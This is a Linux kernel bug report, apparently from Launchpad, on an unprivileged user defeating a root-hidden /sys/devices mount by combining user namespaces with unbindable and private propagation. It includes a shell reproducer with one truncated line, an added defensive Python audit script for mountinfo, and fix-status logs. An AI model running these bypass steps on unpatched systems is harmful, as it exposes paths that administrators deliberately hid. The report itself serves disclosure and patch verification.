Bypass of mount visibility through userns + mount propagation
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| linux (Ubuntu) | Fix Released | High | Unassigned | |
| Trusty | Fix Released | Undecided | Unassigned | |
| Xenial | Fix Released | Undecided | Unassigned | |
| Bionic | Fix Released | Undecided | Unassigned | |
| Cosmic | Fix Released | Undecided | Unassigned | |
| Disco | Fix Released | High | Unassigned | |
Bug Description
[Impact]
Jonathan Calmels from NVIDIA reported that he is able to bypass the mount visibility security check in the Linux kernel by combining the unbindable property with the private mount propagation option, allowing an unprivileged user to see a path which was purposefully hidden by the root user.
[Test Case]
Reproducer:

```
# Hide a path from all users using a tmpfs
root@castiana:~# mount -t tmpfs tmpfs /sys/devices/
root@castiana:~#
# As an unprivileged user, unshare user namespace and mount namespace
stgraber@
# Confirm the path is still not accessible
root@castiana:~# ls /sys/devices/
# Make /sys recursively unbindable and private
root@castiana:~# mount --make-runbindable /sys
root@castiana:~# mount --make-private /sys
# Recursively bind-mount the rest of /sys over to /mnt
root@castiana:~# mount --rbind /sys/ /mnt
# Access our hidden /sys/devices as an unprivileged user
root@castiana:~# ls /mnt/devices/
breakpoint cpu cstate_core cstate_pkg i915 intel_pt isa kprobe LNXSYSTM:00 msr pci0000:00 platform pnp0 power software system tracepoint uncore_arb uncore_cbox_0 uncore_cbox_1 uprobe virtual
```
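The reproducer ends with a second sysfs mount (/mnt) whose `devices` subpath is no longer covered by the tmpfs that root placed on /sys/devices. From the defender's side the useful check is therefore: in every mount namespace reachable under /proc, does each sysfs mount still carry a child mount on `<mountpoint>/devices`? The script below is an added example written for this report; it is not code from the bug, from Ubuntu, or from the reporter. It parses the `/proc/<pid>/mountinfo` format from proc(5); the two snapshots embedded at the bottom are constructed for the demonstration, not captured from a real host, and `scan_proc()` is a hypothetical helper name.

```python
"""Audit mount namespaces for sysfs mounts whose hidden subpath is uncovered.

Added example, not part of the Launchpad bug report. Reads mountinfo text
(one line per mount) and reports sysfs mounts that lack a covering child
mount on <mountpoint>/devices, which is what the bypass above produces.
"""
import glob
import os
from typing import Dict, List, NamedTuple


class Mount(NamedTuple):
    mount_id: int
    parent_id: int
    mountpoint: str
    propagation: List[str]  # optional fields: shared:N, master:N, unbindable, ...
    fstype: str


def _unescape(field: str) -> str:
    """Decode the \\ooo octal escapes mountinfo uses for space, tab, newline, backslash."""
    out, i = [], 0
    while i < len(field):
        digits = field[i + 1:i + 4]
        if field[i] == "\\" and len(digits) == 3 and all(c in "01234567" for c in digits):
            out.append(chr(int(digits, 8)))
            i += 4
        else:
            out.append(field[i])
            i += 1
    return "".join(out)


def parse_mountinfo(text: str) -> List[Mount]:
    """Fields before the lone '-' separator: id, parent, major:minor, root,
    mount point, mount options, then zero or more propagation tags.
    After it: fstype, source, superblock options."""
    mounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pre, sep, post = line.partition(" - ")
        if not sep:
            raise ValueError("malformed mountinfo line: %r" % line)
        pre_fields, post_fields = pre.split(), post.split()
        mounts.append(Mount(int(pre_fields[0]), int(pre_fields[1]),
                            _unescape(pre_fields[4]), pre_fields[6:], post_fields[0]))
    return mounts


def uncovered_mounts(mounts: List[Mount], fstype: str, hidden_subpath: str) -> List[Mount]:
    """Every mount of `fstype` with no child mount sitting exactly on
    <mountpoint>/<hidden_subpath>: a copy of the filesystem exposing the hidden path."""
    children: Dict[int, List[Mount]] = {}
    for m in mounts:
        children.setdefault(m.parent_id, []).append(m)
    exposed = []
    for m in mounts:
        if m.fstype != fstype:
            continue
        want = m.mountpoint.rstrip("/") + "/" + hidden_subpath.strip("/")
        if not any(c.mountpoint == want for c in children.get(m.mount_id, [])):
            exposed.append(m)
    return exposed


def scan_proc(proc_root: str = "/proc", fstype: str = "sysfs",
              hidden_subpath: str = "devices") -> Dict[str, List[str]]:
    """Hypothetical helper: check one process per distinct mount namespace under
    /proc. Needs privilege to read other users' mountinfo and ns/mnt links."""
    seen, findings = set(), {}
    for path in glob.glob(os.path.join(proc_root, "[0-9]*", "mountinfo")):
        pid_dir = os.path.dirname(path)
        try:
            ns = os.readlink(os.path.join(pid_dir, "ns", "mnt"))
            with open(path) as fh:
                text = fh.read()
        except OSError:
            continue  # process exited or not readable by us
        if ns in seen:
            continue
        seen.add(ns)
        exposed = uncovered_mounts(parse_mountinfo(text), fstype, hidden_subpath)
        if exposed:
            findings[ns] = [m.mountpoint for m in exposed]
    return findings


# Constructed snapshots (not captured from a real system). HOST: root's namespace
# with tmpfs covering /sys/devices. BYPASS: the unprivileged namespace after the
# steps above, with /mnt as a second sysfs mount and nothing on /mnt/devices.
HOST_MOUNTINFO = """\
22 1 0:21 / /sys rw,nosuid,nodev,noexec,relatime shared:7 - sysfs sysfs rw
40 22 0:42 / /sys/devices rw,relatime shared:25 - tmpfs tmpfs rw
"""
BYPASS_MOUNTINFO = """\
22 1 0:21 / /sys rw,nosuid,nodev,noexec,relatime unbindable - sysfs sysfs rw
40 22 0:42 / /sys/devices rw,relatime unbindable - tmpfs tmpfs rw
90 1 0:21 / /mnt rw,nosuid,nodev,noexec,relatime - sysfs sysfs rw
"""

if __name__ == "__main__":
    for name, snap in (("host", HOST_MOUNTINFO), ("bypass", BYPASS_MOUNTINFO)):
        exposed = uncovered_mounts(parse_mountinfo(snap), "sysfs", "devices")
        print(name, "->", [m.mountpoint for m in exposed] or "all sysfs mounts covered")
```

On a live host, `scan_proc()` walks `/proc/<pid>/mountinfo` once per distinct `ns/mnt` link, so a namespace created by an unprivileged user shows up as long as the auditing process may read that user's proc entries. The same function applies to proc mounts by passing `fstype="proc"` and the subpath root chose to cover.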
[Regression Potential]
Low. The fixes are relatively simple. Regressions would most likely be specific to software utilizing user namespaces + mount propagation which is a small (but often important) portion of the Ubuntu archive.
CVE References
Activity log:
- description: updated
- information type: Private Security → Public Security
- tags: added: patch
- Changed in linux (Ubuntu Trusty): status: New → Fix Committed
- Changed in linux (Ubuntu Xenial): status: New → Fix Committed
- Changed in linux (Ubuntu Cosmic): status: New → Fix Committed
- Changed in linux (Ubuntu Disco): status: Triaged → Fix Committed
- Changed in linux (Ubuntu Bionic): status: New → Fix Committed
- tags: added: verification-done-bionic verification-done-cosmic verification-done-trusty verification-done-xenial; removed: verification-needed-bionic verification-needed-cosmic verification-needed-trusty verification-needed-xenial
- tags: added: cscc
I've reproduced this on Ubuntu 4.15 but Jonathan reported being able to use this flaw on a variety of kernels.
Note that fixing this issue, as was the case for the initial mount visibility issue, will come at the cost of some userspace breakages where they effectively rely on this bug.
It's my understanding that Jonathan's own software is currently relying on this bug and will need to switch to an alternative/proper way of dealing with this.